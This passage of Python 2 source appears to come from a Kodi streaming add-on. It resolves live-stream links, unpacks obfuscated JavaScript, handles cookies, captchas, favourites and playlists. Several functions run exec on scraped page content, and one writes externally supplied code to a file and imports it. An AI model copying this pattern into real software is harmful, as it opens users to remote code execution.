  1604. s=page_data
  1605. while 'geh(' in s:
  1606. if s.startswith('lol('): s=s[5:-1]
  1607. # print 's is ',s
  1608. s=re.compile('"(.*?)"').findall(s)[0];
  1609. s= base64.b64decode(s);
  1610. s=urllib.unquote(s);
  1611. print s
  1612. return s
  1613.  
  1614. def get_ferrari_url(page_data):
  1615. # print 'get_dag_url2',page_data
  1616. page_data2=getUrl(page_data);
  1617. patt='(http.*)'
  1618. import uuid
  1619. playback=str(uuid.uuid1()).upper()
  1620. links=re.compile(patt).findall(page_data2)
  1621. headers=[('X-Playback-Session-Id',playback)]
  1622. for l in links:
  1623. try:
  1624. page_datatemp=getUrl(l,headers=headers);
  1625.  
  1626. except: pass
  1627.  
  1628. return page_data+'|&X-Playback-Session-Id='+playback
  1629.  
  1630.  
  1631. def get_dag_url(page_data):
  1632. # print 'get_dag_url',page_data
  1633. if page_data.startswith('http://dag.total-stream.net'):
  1634. headers=[('User-Agent','Verismo-BlackUI_(2.4.7.5.8.0.34)')]
  1635. page_data=getUrl(page_data,headers=headers);
  1636.  
  1637. if '127.0.0.1' in page_data:
  1638. return revist_dag(page_data)
  1639. elif re_me(page_data, 'wmsAuthSign%3D([^%&]+)') != '':
  1640. final_url = re_me(page_data, '&ver_t=([^&]+)&') + '?wmsAuthSign=' + re_me(page_data, 'wmsAuthSign%3D([^%&]+)') + '==/mp4:' + re_me(page_data, '\\?y=([^&]+)&')
  1641. else:
  1642. final_url = re_me(page_data, 'href="([^"]+)"[^"]+$')
  1643. if len(final_url)==0:
  1644. final_url=page_data
  1645. final_url = final_url.replace(' ', '%20')
  1646. return final_url
  1647.  
  1648. def re_me(data, re_patten):
  1649. match = ''
  1650. m = re.search(re_patten, data)
  1651. if m != None:
  1652. match = m.group(1)
  1653. else:
  1654. match = ''
  1655. return match
  1656.  
def revist_dag(page_data):
    # Second pass over a total-stream.net 'dag' redirect: turns the
    # localhost stub into "server live=true timeout=15 playpath=...",
    # optionally with ?token= / wmsAuthSign auth, falling back to a plain
    # HREF link (old-style asx pages).
    final_url = ''
    if '127.0.0.1' in page_data:
        # localhost stub: server and playpath are embedded in the query string
        final_url = re_me(page_data, '&ver_t=([^&]+)&') + ' live=true timeout=15 playpath=' + re_me(page_data, '\\?y=([a-zA-Z0-9-_\\.@]+)')

        if re_me(page_data, 'token=([^&]+)&') != '':
            final_url = final_url + '?token=' + re_me(page_data, 'token=([^&]+)&')
    elif re_me(page_data, 'wmsAuthSign%3D([^%&]+)') != '':
        # auth-signed stream variant
        final_url = re_me(page_data, '&ver_t=([^&]+)&') + '?wmsAuthSign=' + re_me(page_data, 'wmsAuthSign%3D([^%&]+)') + '==/mp4:' + re_me(page_data, '\\?y=([^&]+)&')
    else:
        final_url = re_me(page_data, 'HREF="([^"]+)"')

    if 'dag1.asx' in final_url:
        # yet another redirector level
        return get_dag_url(final_url)

    # normalise dev/perm host names to the public 'flive' host, unless the
    # url already points at the fs.fplive.net variants
    if 'devinlivefs.fplive.net' not in final_url:
        final_url = final_url.replace('devinlive', 'flive')
    if 'permlivefs.fplive.net' not in final_url:
        final_url = final_url.replace('permlive', 'flive')
    return final_url
  1677.  
  1678.  
def get_unwise( str_eval):
    # Decode the JavaScript "w,i,s,e" obfuscation used by some stream hosts.
    # str_eval is the argument list of the packed eval(function(w,i,s,e)...)
    # call, e.g. "'..','..','..','..'"; exec binds the four strings to local
    # names w,i,s,e which unwise_func() then decodes.
    # NOTE(review): exec on page-derived data is inherently unsafe; kept
    # as-is because the whole resolver pipeline relies on it.
    page_value=""
    try:
        ss="w,i,s,e=("+str_eval+')'
        exec (ss)
        page_value=unwise_func(w,i,s,e)
    except: traceback.print_exc(file=sys.stdout)
    #print 'unpacked',page_value
    return page_value
  1688.  
  1689. def unwise_func( w, i, s, e):
  1690. lIll = 0;
  1691. ll1I = 0;
  1692. Il1l = 0;
  1693. ll1l = [];
  1694. l1lI = [];
  1695. while True:
  1696. if (lIll < 5):
  1697. l1lI.append(w[lIll])
  1698. elif (lIll < len(w)):
  1699. ll1l.append(w[lIll]);
  1700. lIll+=1;
  1701. if (ll1I < 5):
  1702. l1lI.append(i[ll1I])
  1703. elif (ll1I < len(i)):
  1704. ll1l.append(i[ll1I])
  1705. ll1I+=1;
  1706. if (Il1l < 5):
  1707. l1lI.append(s[Il1l])
  1708. elif (Il1l < len(s)):
  1709. ll1l.append(s[Il1l]);
  1710. Il1l+=1;
  1711. if (len(w) + len(i) + len(s) + len(e) == len(ll1l) + len(l1lI) + len(e)):
  1712. break;
  1713.  
  1714. lI1l = ''.join(ll1l)#.join('');
  1715. I1lI = ''.join(l1lI)#.join('');
  1716. ll1I = 0;
  1717. l1ll = [];
  1718. for lIll in range(0,len(ll1l),2):
  1719. #print 'array i',lIll,len(ll1l)
  1720. ll11 = -1;
  1721. if ( ord(I1lI[ll1I]) % 2):
  1722. ll11 = 1;
  1723. #print 'val is ', lI1l[lIll: lIll+2]
  1724. l1ll.append(chr( int(lI1l[lIll: lIll+2], 36) - ll11));
  1725. ll1I+=1;
  1726. if (ll1I >= len(l1lI)):
  1727. ll1I = 0;
  1728. ret=''.join(l1ll)
  1729. if 'eval(function(w,i,s,e)' in ret:
  1730. # print 'STILL GOing'
  1731. ret=re.compile('eval\(function\(w,i,s,e\).*}\((.*?)\)').findall(ret)[0]
  1732. return get_unwise(ret)
  1733. else:
  1734. # print 'FINISHED'
  1735. return ret
  1736.  
  1737. def get_unpacked( page_value, regex_for_text='', iterations=1, total_iteration=1):
  1738. try:
  1739. reg_data=None
  1740. if page_value.startswith("http"):
  1741. page_value= getUrl(page_value)
  1742. # print 'page_value',page_value
  1743. if regex_for_text and len(regex_for_text)>0:
  1744. try:
  1745. page_value=re.compile(regex_for_text).findall(page_value)[0] #get the js variable
  1746. except: return 'NOTPACKED'
  1747.  
  1748. page_value=unpack(page_value,iterations,total_iteration)
  1749. except:
  1750. page_value='UNPACKEDFAILED'
  1751. traceback.print_exc(file=sys.stdout)
  1752. # print 'unpacked',page_value
  1753. if 'sav1live.tv' in page_value:
  1754. page_value=page_value.replace('sav1live.tv','sawlive.tv') #quick fix some bug somewhere
  1755. # print 'sav1 unpacked',page_value
  1756. return page_value
  1757.  
def unpack(sJavascript,iteration=1, totaliterations=2 ):
    # Extract the (p, a, c, k) arguments of a Dean-Edwards-style JS packer
    # call and substitute the packed tokens back via __unpack().
    # Two input shapes are handled: a 'var _0xcb8a=' array variant and the
    # classic "}('p',a,c,'k'.split('|')..." variant. Recurses up to
    # `totaliterations` times for nested packing.
    # WARNING: exec on scraped page content - only safe for trusted sources.
    if sJavascript.startswith('var _0xcb8a='):
        # array variant: exec the literal array, then pick p/k out of it
        aSplit=sJavascript.split('var _0xcb8a=')
        ss="myarray="+aSplit[1].split("eval(")[0]
        exec(ss)
        a1=62
        c1=int(aSplit[1].split(",62,")[1].split(',')[0])
        p1=myarray[0]
        k1=myarray[3]
        # debug dump of the keyword table (written to the current directory)
        with open('temp file'+str(iteration)+'.js', "wb") as filewriter:
            filewriter.write(str(k1))
    else:
        # classic variant: split at the end of the packer function body
        if "rn p}('" in sJavascript:
            aSplit = sJavascript.split("rn p}('")
        else:
            aSplit = sJavascript.split("rn A}('")

        p1,a1,c1,k1=('','0','0','')

        # exec the argument tuple to bind p1 (payload), a1 (radix),
        # c1 (token count) and k1 (keyword string)
        ss="p1,a1,c1,k1=('"+aSplit[1].split(".spli")[0]+')'
        exec(ss)
        k1=k1.split('|')
        aSplit = aSplit[1].split("))'")

    e = ''
    d = ''

    sUnpacked1 = str(__unpack(p1, a1, c1, k1, e, d,iteration))

    if iteration>=totaliterations:
        return sUnpacked1
    else:
        # payload may itself be packed - unpack the next layer
        return unpack(sUnpacked1,iteration+1)
  1823.  
  1824. def __unpack(p, a, c, k, e, d, iteration,v=1):
  1825.  
  1826. #with open('before file'+str(iteration)+'.js', "wb") as filewriter:
  1827. # filewriter.write(str(p))
  1828. while (c >= 1):
  1829. c = c -1
  1830. if (k[c]):
  1831. aa=str(__itoaNew(c, a))
  1832. if v==1:
  1833. p=re.sub('\\b' + aa +'\\b', k[c], p)# THIS IS Bloody slow!
  1834. else:
  1835. p=findAndReplaceWord(p,aa,k[c])
  1836.  
  1837. #p=findAndReplaceWord(p,aa,k[c])
  1838.  
  1839.  
  1840. #with open('after file'+str(iteration)+'.js', "wb") as filewriter:
  1841. # filewriter.write(str(p))
  1842. return p
  1843.  
  1844. #
  1845. #function equalavent to re.sub('\\b' + aa +'\\b', k[c], p)
  1846. def findAndReplaceWord(source_str, word_to_find,replace_with):
  1847. splits=None
  1848. splits=source_str.split(word_to_find)
  1849. if len(splits)>1:
  1850. new_string=[]
  1851. current_index=0
  1852. for current_split in splits:
  1853. #print 'here',i
  1854. new_string.append(current_split)
  1855. val=word_to_find#by default assume it was wrong to split
  1856.  
  1857. #if its first one and item is blank then check next item is valid or not
  1858. if current_index==len(splits)-1:
  1859. val='' # last one nothing to append normally
  1860. else:
  1861. if len(current_split)==0: #if blank check next one with current split value
  1862. if ( len(splits[current_index+1])==0 and word_to_find[0].lower() not in 'abcdefghijklmnopqrstuvwxyz1234567890_') or (len(splits[current_index+1])>0 and splits[current_index+1][0].lower() not in 'abcdefghijklmnopqrstuvwxyz1234567890_'):# first just just check next
  1863. val=replace_with
  1864. #not blank, then check current endvalue and next first value
  1865. else:
  1866. if (splits[current_index][-1].lower() not in 'abcdefghijklmnopqrstuvwxyz1234567890_') and (( len(splits[current_index+1])==0 and word_to_find[0].lower() not in 'abcdefghijklmnopqrstuvwxyz1234567890_') or (len(splits[current_index+1])>0 and splits[current_index+1][0].lower() not in 'abcdefghijklmnopqrstuvwxyz1234567890_')):# first just just check next
  1867. val=replace_with
  1868.  
  1869. new_string.append(val)
  1870. current_index+=1
  1871. #aaaa=1/0
  1872. source_str=''.join(new_string)
  1873. return source_str
  1874.  
  1875. def __itoa(num, radix):
  1876. # print 'num red',num, radix
  1877. result = ""
  1878. if num==0: return '0'
  1879. while num > 0:
  1880. result = "0123456789abcdefghijklmnopqrstuvwxyz"[num % radix] + result
  1881. num /= radix
  1882. return result
  1883.  
  1884. def __itoaNew(cc, a):
  1885. aa="" if cc < a else __itoaNew(int(cc / a),a)
  1886. cc = (cc % a)
  1887. bb=chr(cc + 29) if cc> 35 else str(__itoa(cc,36))
  1888. return aa+bb
  1889.  
  1890.  
  1891. def getCookiesString(cookieJar):
  1892. try:
  1893. cookieString=""
  1894. for index, cookie in enumerate(cookieJar):
  1895. cookieString+=cookie.name + "=" + cookie.value +";"
  1896. except: pass
  1897. #print 'cookieString',cookieString
  1898. return cookieString
  1899.  
  1900.  
  1901. def saveCookieJar(cookieJar,COOKIEFILE):
  1902. try:
  1903. complete_path=os.path.join(profile,COOKIEFILE)
  1904. cookieJar.save(complete_path,ignore_discard=True)
  1905. except: pass
  1906.  
  1907. def getCookieJar(COOKIEFILE):
  1908.  
  1909. cookieJar=None
  1910. if COOKIEFILE:
  1911. try:
  1912. complete_path=os.path.join(profile,COOKIEFILE)
  1913. cookieJar = cookielib.LWPCookieJar()
  1914. cookieJar.load(complete_path,ignore_discard=True)
  1915. except:
  1916. cookieJar=None
  1917.  
  1918. if not cookieJar:
  1919. cookieJar = cookielib.LWPCookieJar()
  1920.  
  1921. return cookieJar
  1922.  
def doEval(fun_call,page_data,Cookie_Jar,m):
    # Evaluate a regex-file-supplied Python call string of the form
    # "module.function(...)". The module (everything before the first '.') is
    # imported from functions_dir; the full expression is then exec'd and may
    # reference page_data, Cookie_Jar and m. Returns the result, stringified
    # when possible.
    # WARNING: exec/eval of externally supplied code - trusted input only.
    ret_val=''
    if functions_dir not in sys.path:
        sys.path.append(functions_dir)

    try:
        py_file='import '+fun_call.split('.')[0]
        exec( py_file)
    except:
        # import failed; the exec below will most likely raise NameError
        traceback.print_exc(file=sys.stdout)
    exec ('ret_val='+fun_call)
    try:
        return str(ret_val)
    except: return ret_val
  1945.  
def doEvalFunction(fun_call,page_data,Cookie_Jar,m):
    # Write externally supplied Python source (`fun_call`) to a uniquely
    # numbered LSProdynamicCode<N>.py inside functions_dir, import it and
    # call its GetLSProData(page_data, Cookie_Jar, m) entry point.
    # Returns "" on any failure.
    # WARNING: executes downloaded code - trusted sources only.
    try:
        global gLSProDynamicCodeNumber
        # bump the counter so each evaluation gets a fresh module name
        gLSProDynamicCodeNumber=gLSProDynamicCodeNumber+1
        ret_val=''
        print 'doooodoo'
        if functions_dir not in sys.path:
            sys.path.append(functions_dir)

        filename='LSProdynamicCode%s.py'%str(gLSProDynamicCodeNumber)
        filenamewithpath=os.path.join(functions_dir,filename)
        f=open(filenamewithpath,"wb")
        f.write("# -*- coding: utf-8 -*-\n")
        f.write(fun_call.encode("utf-8"));
        f.close()
        print 'before do'
        LSProdynamicCode = import_by_string(filename.split('.')[0],filenamewithpath)
        print 'after'

        ret_val=LSProdynamicCode.GetLSProData(page_data,Cookie_Jar,m)
        try:
            return str(ret_val)
        except: return ret_val
    except: traceback.print_exc()
    return ""
  1972.  
  1973. def import_by_string(full_name,filenamewithpath):
  1974. try:
  1975.  
  1976. import importlib
  1977. return importlib.import_module(full_name, package=None)
  1978. except:
  1979. import imp
  1980. return imp.load_source(full_name,filenamewithpath)
  1981.  
  1982.  
def getGoogleRecaptchaResponse(captchakey, cj,type=1): #1 for get, 2 for post, 3 for rawpost
    # Solve a legacy Google reCAPTCHA v1 challenge: fetch the challenge
    # script for `captchakey`, reload to get the image token, download the
    # image into the profile dir, show it via InputWindow for the user to
    # solve, and return the challenge/response pair encoded per `type`
    # (1 and 3: urlencoded query string, 2: colon/comma separated).
    # Returns '' when no challenge token was obtained.
    recapChallenge=""
    solution=""
    captcha=False
    captcha_reload_response_chall=None
    solution=None
    if len(captchakey)>0:
        captcha_url=captchakey
        if not captcha_url.startswith('http'):
            # bare site key - build the ajax challenge URL from it
            captcha_url='http://www.google.com/recaptcha/api/challenge?k='+captcha_url+'&ajax=1'
        captcha=True

        cap_chall_reg='challenge.*?\'(.*?)\''
        cap_image_reg='\'(.*?)\''
        captcha_script=getUrl(captcha_url,cookieJar=cj)
        recapChallenge=re.findall(cap_chall_reg, captcha_script)[0]
        # ask for an image-type challenge token
        captcha_reload='http://www.google.com/recaptcha/api/reload?c=';
        captcha_k=captcha_url.split('k=')[1]
        captcha_reload+=recapChallenge+'&k='+captcha_k+'&reason=i&type=image&lang=en'
        captcha_reload_js=getUrl(captcha_reload,cookieJar=cj)
        captcha_reload_response_chall=re.findall(cap_image_reg, captcha_reload_js)[0]
        captcha_image_url='http://www.google.com/recaptcha/api/image?c='+captcha_reload_response_chall
        if not captcha_image_url.startswith("http"):
            captcha_image_url='http://www.google.com/recaptcha/api/'+captcha_image_url
        import random
        # random name so concurrent prompts don't clobber each other
        n=random.randrange(100,1000,5)
        local_captcha = os.path.join(profile,str(n) +"captcha.img" )
        localFile = open(local_captcha, "wb")
        localFile.write(getUrl(captcha_image_url,cookieJar=cj))
        localFile.close()
        solver = InputWindow(captcha=local_captcha)
        solution = solver.get()
        os.remove(local_captcha)

    if captcha_reload_response_chall:
        if type==1:
            return 'recaptcha_challenge_field='+urllib.quote_plus(captcha_reload_response_chall)+'&recaptcha_response_field='+urllib.quote_plus(solution)
        elif type==2:
            return 'recaptcha_challenge_field:'+captcha_reload_response_chall+',recaptcha_response_field:'+solution
        else:
            return 'recaptcha_challenge_field='+urllib.quote_plus(captcha_reload_response_chall)+'&recaptcha_response_field='+urllib.quote_plus(solution)
    else:
        return ''
  2035.  
  2036.  
  2037. def getUrl(url, cookieJar=None,post=None, timeout=20, headers=None, noredir=False):
  2038.  
  2039.  
  2040. cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
  2041.  
  2042. if noredir:
  2043. opener = urllib2.build_opener(NoRedirection,cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
  2044. else:
  2045. opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
  2046. #opener = urllib2.install_opener(opener)
  2047. req = urllib2.Request(url)
  2048. req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
  2049. if headers:
  2050. for h,hv in headers:
  2051. req.add_header(h,hv)
  2052.  
  2053. response = opener.open(req,post,timeout=timeout)
  2054. link=response.read()
  2055. response.close()
  2056. return link;
  2057.  
  2058. def get_decode(str,reg=None):
  2059. if reg:
  2060. str=re.findall(reg, str)[0]
  2061. s1 = urllib.unquote(str[0: len(str)-1]);
  2062. t = '';
  2063. for i in range( len(s1)):
  2064. t += chr(ord(s1[i]) - s1[len(s1)-1]);
  2065. t=urllib.unquote(t)
  2066. # print t
  2067. return t
  2068.  
  2069. def javascriptUnEscape(str):
  2070. js=re.findall('unescape\(\'(.*?)\'',str)
  2071. # print 'js',js
  2072. if (not js==None) and len(js)>0:
  2073. for j in js:
  2074. #print urllib.unquote(j)
  2075. str=str.replace(j ,urllib.unquote(j))
  2076. return str
  2077.  
  2078. iid=0
  2079. def askCaptcha(m,html_page, cookieJar):
  2080. global iid
  2081. iid+=1
  2082. expre= m['expres']
  2083. page_url = m['page']
  2084. captcha_regex=re.compile('\$LiveStreamCaptcha\[([^\]]*)\]').findall(expre)[0]
  2085.  
  2086. captcha_url=re.compile(captcha_regex).findall(html_page)[0]
  2087. # print expre,captcha_regex,captcha_url
  2088. if not captcha_url.startswith("http"):
  2089. page_='http://'+"".join(page_url.split('/')[2:3])
  2090. if captcha_url.startswith("/"):
  2091. captcha_url=page_+captcha_url
  2092. else:
  2093. captcha_url=page_+'/'+captcha_url
  2094.  
  2095. local_captcha = os.path.join(profile, str(iid)+"captcha.jpg" )
  2096. localFile = open(local_captcha, "wb")
  2097. # print ' c capurl',captcha_url
  2098. req = urllib2.Request(captcha_url)
  2099. req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1')
  2100. if 'referer' in m:
  2101. req.add_header('Referer', m['referer'])
  2102. if 'agent' in m:
  2103. req.add_header('User-agent', m['agent'])
  2104. if 'setcookie' in m:
  2105. # print 'adding cookie',m['setcookie']
  2106. req.add_header('Cookie', m['setcookie'])
  2107.  
  2108. #cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
  2109. #opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
  2110. #opener = urllib2.install_opener(opener)
  2111. urllib2.urlopen(req)
  2112. response = urllib2.urlopen(req)
  2113.  
  2114. localFile.write(response.read())
  2115. response.close()
  2116. localFile.close()
  2117. solver = InputWindow(captcha=local_captcha)
  2118. solution = solver.get()
  2119. return solution
  2120.  
  2121. def askCaptchaNew(imageregex,html_page,cookieJar,m):
  2122. global iid
  2123. iid+=1
  2124.  
  2125.  
  2126. if not imageregex=='':
  2127. if html_page.startswith("http"):
  2128. page_=getUrl(html_page,cookieJar=cookieJar)
  2129. else:
  2130. page_=html_page
  2131. captcha_url=re.compile(imageregex).findall(html_page)[0]
  2132. else:
  2133. captcha_url=html_page
  2134. if 'oneplay.tv/embed' in html_page:
  2135. import oneplay
  2136. page_=getUrl(html_page,cookieJar=cookieJar)
  2137. captcha_url=oneplay.getCaptchaUrl(page_)
  2138.  
  2139. local_captcha = os.path.join(profile, str(iid)+"captcha.jpg" )
  2140. localFile = open(local_captcha, "wb")
  2141. # print ' c capurl',captcha_url
  2142. req = urllib2.Request(captcha_url)
  2143. req.add_header('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1')
  2144. if 'referer' in m:
  2145. req.add_header('Referer', m['referer'])
  2146. if 'agent' in m:
  2147. req.add_header('User-agent', m['agent'])
  2148. if 'accept' in m:
  2149. req.add_header('Accept', m['accept'])
  2150. if 'setcookie' in m:
  2151. # print 'adding cookie',m['setcookie']
  2152. req.add_header('Cookie', m['setcookie'])
  2153.  
  2154. #cookie_handler = urllib2.HTTPCookieProcessor(cookieJar)
  2155. #opener = urllib2.build_opener(cookie_handler, urllib2.HTTPBasicAuthHandler(), urllib2.HTTPHandler())
  2156. #opener = urllib2.install_opener(opener)
  2157. #urllib2.urlopen(req)
  2158. response = urllib2.urlopen(req)
  2159.  
  2160. localFile.write(response.read())
  2161. response.close()
  2162. localFile.close()
  2163. solver = InputWindow(captcha=local_captcha)
  2164. solution = solver.get()
  2165. return solution
  2166.  
  2167. #########################################################
  2168. # Function : GUIEditExportName #
  2169. #########################################################
  2170. # Parameter : #
  2171. # #
  2172. # name sugested name for export #
  2173. # #
  2174. # Returns : #
  2175. # #
  2176. # name name of export excluding any extension #
  2177. # #
  2178. #########################################################
  2179. def TakeInput(name, headname):
  2180.  
  2181.  
  2182. kb = xbmc.Keyboard('default', 'heading', True)
  2183. kb.setDefault(name)
  2184. kb.setHeading(headname)
  2185. kb.setHiddenInput(False)
  2186. return kb.getText()
  2187.  
  2188.  
  2189. #########################################################
  2190.  
  2191. class InputWindow(xbmcgui.WindowDialog):
  2192. def __init__(self, *args, **kwargs):
  2193. self.cptloc = kwargs.get('captcha')
  2194. self.img = xbmcgui.ControlImage(335,30,624,60,self.cptloc)
  2195. self.addControl(self.img)
  2196. self.kbd = xbmc.Keyboard()
  2197.  
  2198. def get(self):
  2199. self.show()
  2200. time.sleep(2)
  2201. self.kbd.doModal()
  2202. if (self.kbd.isConfirmed()):
  2203. text = self.kbd.getText()
  2204. self.close()
  2205. return text
  2206. self.close()
  2207. return False
  2208.  
  2209. def getEpocTime():
  2210. import time
  2211. return str(int(time.time()*1000))
  2212.  
  2213. def getEpocTime2():
  2214. import time
  2215. return str(int(time.time()))
  2216.  
  2217. def get_params():
  2218. param=[]
  2219. paramstring=sys.argv[2]
  2220. if len(paramstring)>=2:
  2221. params=sys.argv[2]
  2222. cleanedparams=params.replace('?','')
  2223. if (params[len(params)-1]=='/'):
  2224. params=params[0:len(params)-2]
  2225. pairsofparams=cleanedparams.split('&')
  2226. param={}
  2227. for i in range(len(pairsofparams)):
  2228. splitparams={}
  2229. splitparams=pairsofparams[i].split('=')
  2230. if (len(splitparams))==2:
  2231. param[splitparams[0]]=splitparams[1]
  2232. return param
  2233.  
  2234.  
  2235. def getFavorites():
  2236. items = json.loads(open(favorites).read())
  2237. total = len(items)
  2238. for i in items:
  2239. name = i[0]
  2240. url = i[1]
  2241. iconimage = i[2]
  2242. try:
  2243. fanArt = i[3]
  2244. if fanArt == None:
  2245. raise
  2246. except:
  2247. if addon.getSetting('use_thumb') == "true":
  2248. fanArt = iconimage
  2249. else:
  2250. fanArt = fanart
  2251. try: playlist = i[5]
  2252. except: playlist = None
  2253. try: regexs = i[6]
  2254. except: regexs = None
  2255.  
  2256. if i[4] == 0:
  2257. addLink(url,name,iconimage,fanArt,'','','','fav',playlist,regexs,total)
  2258. else:
  2259. addDir(name,url,i[4],iconimage,fanart,'','','','','fav')
  2260.  
  2261.  
  2262. def addFavorite(name,url,iconimage,fanart,mode,playlist=None,regexs=None):
  2263. favList = []
  2264. try:
  2265. # seems that after
  2266. name = name.encode('utf-8', 'ignore')
  2267. except:
  2268. pass
  2269. if os.path.exists(favorites)==False:
  2270. addon_log('Making Favorites File')
  2271. favList.append((name,url,iconimage,fanart,mode,playlist,regexs))
  2272. a = open(favorites, "w")
  2273. a.write(json.dumps(favList))
  2274. a.close()
  2275. else:
  2276. addon_log('Appending Favorites')
  2277. a = open(favorites).read()
  2278. data = json.loads(a)
  2279. data.append((name,url,iconimage,fanart,mode))
  2280. b = open(favorites, "w")
  2281. b.write(json.dumps(data))
  2282. b.close()
  2283.  
  2284.  
  2285. def rmFavorite(name):
  2286. data = json.loads(open(favorites).read())
  2287. for index in range(len(data)):
  2288. if data[index][0]==name:
  2289. del data[index]
  2290. b = open(favorites, "w")
  2291. b.write(json.dumps(data))
  2292. b.close()
  2293. break
  2294. xbmc.executebuiltin("XBMC.Container.Refresh")
  2295.  
  2296. def urlsolver(url):
  2297. import urlresolver
  2298. host = urlresolver.HostedMediaFile(url)
  2299. if host:
  2300. resolver = urlresolver.resolve(url)
  2301. resolved = resolver
  2302. if isinstance(resolved,list):
  2303. for k in resolved:
  2304. quality = addon.getSetting('quality')
  2305. if k['quality'] == 'HD' :
  2306. resolver = k['url']
  2307. break
  2308. elif k['quality'] == 'SD' :
  2309. resolver = k['url']
  2310. elif k['quality'] == '1080p' and addon.getSetting('1080pquality') == 'true' :
  2311. resolver = k['url']
  2312. break
  2313. else:
  2314. resolver = resolved
  2315. else:
  2316. xbmc.executebuiltin("XBMC.Notification(CocinaTu,Urlresolver donot support this domain. - ,5000)")
  2317. resolver=url
  2318. return resolver
def tryplay(url,listitem,pdialogue=None):
    # Try to start playback of `url` and report success.
    # plugin:// URLs (except youtube) are launched via RunPlugin and polled
    # for up to ~4s; everything else goes through CustomPlayer and is polled
    # until the player reports the URL played or a ~4s timeout passes.
    if url.lower().startswith('plugin') and 'youtube' not in url.lower():
        print 'playing via runplugin'
        xbmc.executebuiltin('XBMC.RunPlugin('+url+')')
        for i in range(8):
            xbmc.sleep(500)  # poll every half second, 8 times
            try:
                if xbmc.getCondVisibility("Player.HasMedia") and xbmc.Player().isPlaying():
                    return True
            except: pass
        print 'returning now'
        return False
    import CustomPlayer,time

    player = CustomPlayer.MyXBMCPlayer()
    player.pdialogue=pdialogue
    start = time.time()
    print 'going to play'
    import time
    beforestart=time.time()
    player.play( url, listitem)
    xbmc.sleep(1000)

    try:
        # poll the custom player; bail out after ~4 seconds without playback
        while player.is_active:
            xbmc.sleep(400)

            if player.urlplayed:
                print 'yes played'
                return True
            if time.time()-beforestart>4: return False
    except: pass
    print 'not played',url
    return False
def play_playlist(name, mu_playlist,queueVideo=None):
    # Play a multi-link playlist. Three modes:
    #  - '$$LSPlayOnlyOne$$' marker on the first entry: try each link in turn
    #    (with a progress dialog) until one actually plays, then stop;
    #  - 'ask_playlist_items' setting on: show a picker and play the chosen
    #    link only;
    #  - otherwise: queue every link into the video playlist and start it,
    #    or (queueVideo set) just append to the current playlist.
    # Entries may carry '$$lsname=<label>' display names and '&regexs=' /
    # '&mode=19' resolver markers.
    # NOTE(review): `iconimage` below is not a parameter - it relies on a
    # module-level global being set by the caller; confirm.
    playlist = xbmc.PlayList(xbmc.PLAYLIST_VIDEO)
    if '$$LSPlayOnlyOne$$' in mu_playlist[0]:
        mu_playlist[0]=mu_playlist[0].replace('$$LSPlayOnlyOne$$','')
        import urlparse
        names = []
        iloop=0
        progress = xbmcgui.DialogProgress()
        progress.create('Progress', 'Trying Multiple Links')
        for i in mu_playlist:
            # derive a display name: explicit $$lsname= label or the host
            if '$$lsname=' in i:
                d_name=i.split('$$lsname=')[1].split('&regexs')[0]
                names.append(d_name)
                mu_playlist[iloop]=i.split('$$lsname=')[0]+('&regexs'+i.split('&regexs')[1] if '&regexs' in i else '')
            else:
                d_name=urlparse.urlparse(i).netloc
                if d_name == '':
                    names.append(name)
                else:
                    names.append(d_name)
            index=iloop
            iloop+=1

            playname=names[index]
            if progress.iscanceled(): return
            progress.update( iloop/len(mu_playlist)*100,"", "Link#%d"%(iloop),playname )
            print 'auto playnamexx',playname
            if "&mode=19" in mu_playlist[index]:
                # urlresolver-backed link
                liz = xbmcgui.ListItem(playname, iconImage=iconimage, thumbnailImage=iconimage)
                liz.setInfo(type='Video', infoLabels={'Title':playname})
                liz.setProperty("IsPlayable","true")
                urltoplay=urlsolver(mu_playlist[index].replace('&mode=19','').replace(';',''))
                liz.setPath(urltoplay)
                played=tryplay(urltoplay,liz)
            elif "$doregex" in mu_playlist[index] :
                # regex-parsed link: resolve through getRegexParsed first
                sepate = mu_playlist[index].split('&regexs=')
                url,setresolved = getRegexParsed(sepate[1], sepate[0])
                url2 = url.replace(';','')
                liz = xbmcgui.ListItem(playname, iconImage=iconimage, thumbnailImage=iconimage)
                liz.setInfo(type='Video', infoLabels={'Title':playname})
                liz.setProperty("IsPlayable","true")
                liz.setPath(url2)
                played=tryplay(url2,liz)

            else:
                # direct URL
                url = mu_playlist[index]
                url=url.split('&regexs=')[0]
                liz = xbmcgui.ListItem(playname, iconImage=iconimage, thumbnailImage=iconimage)
                liz.setInfo(type='Video', infoLabels={'Title':playname})
                liz.setProperty("IsPlayable","true")
                liz.setPath(url)
                played=tryplay(url,liz)
            print 'played',played
            print 'played',played
            if played: return
        return
    if addon.getSetting('ask_playlist_items') == 'true' and not queueVideo :
        import urlparse
        names = []
        iloop=0
        for i in mu_playlist:
            if '$$lsname=' in i:
                d_name=i.split('$$lsname=')[1].split('&regexs')[0]
                names.append(d_name)
                mu_playlist[iloop]=i.split('$$lsname=')[0]+('&regexs'+i.split('&regexs')[1] if '&regexs' in i else '')
            else:
                d_name=urlparse.urlparse(i).netloc
                if d_name == '':
                    names.append(name)
                else:
                    names.append(d_name)

            iloop+=1
        dialog = xbmcgui.Dialog()
        index = dialog.select('Choose a video source', names)
        if index >= 0:
            playname=names[index]
            print 'playnamexx',playname
            if "&mode=19" in mu_playlist[index]:
                liz = xbmcgui.ListItem(playname, iconImage=iconimage, thumbnailImage=iconimage)
                liz.setInfo(type='Video', infoLabels={'Title':playname})
                liz.setProperty("IsPlayable","true")
                urltoplay=urlsolver(mu_playlist[index].replace('&mode=19','').replace(';',''))
                liz.setPath(urltoplay)
                xbmc.Player().play(urltoplay,liz)
            elif "$doregex" in mu_playlist[index] :
                sepate = mu_playlist[index].split('&regexs=')
                url,setresolved = getRegexParsed(sepate[1], sepate[0])
                url2 = url.replace(';','')
